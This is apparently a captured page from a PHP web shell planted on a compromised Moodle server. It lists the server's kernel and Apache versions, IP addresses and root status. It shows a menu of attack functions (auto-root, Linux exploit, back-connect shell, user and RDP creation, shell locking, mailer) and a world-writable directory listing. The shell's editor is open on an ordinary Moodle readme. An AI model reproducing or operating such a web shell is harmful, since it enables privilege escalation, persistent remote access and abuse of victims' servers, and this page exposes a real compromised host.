Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
editor /
atto /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
yui
[ DIR ]
drwxrwxrwx
adminlib.php
8.17
KB
-rwxrwxrwx
autosave-ajax.php
7.99
KB
-rwxrwxrwx
lib.php
6.98
KB
-rwxrwxrwx
readme_moodle.txt
923
B
-rwxrwxrwx
settings.php
2.43
KB
-rwxrwxrwx
thirdpartylibs.xml
235
B
-rwxrwxrwx
upgrade.txt
874
B
-rwxrwxrwx
version.php
1.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of the import of libraries associated with the Atto editor. 1) Rangy (version 1.2.3) * Download the latest stable release; * Delete all files in yui/src/rangy/js * Copy the content of the 'currentrelease/uncompressed' folder into yui/src/rangy/js * Patch out the AMD / module support from rangy (because we are loading it with YUI) To do this - change the code start of each js file to look like (just delete the other lines): (function(factory, root) { // No AMD or CommonJS support so we use the rangy property of root (probably the global variable) factory(root.rangy); })(function(rangy) { * Run shifter against yui/src/rangy Notes: * We have patched 1.2.3 with a backport fix from the next release of Rangy which addresses an incompatibility between Rangy and HTML5Shiv which is used in the bootstrapclean theme. See MDL-44798 for further information.
Close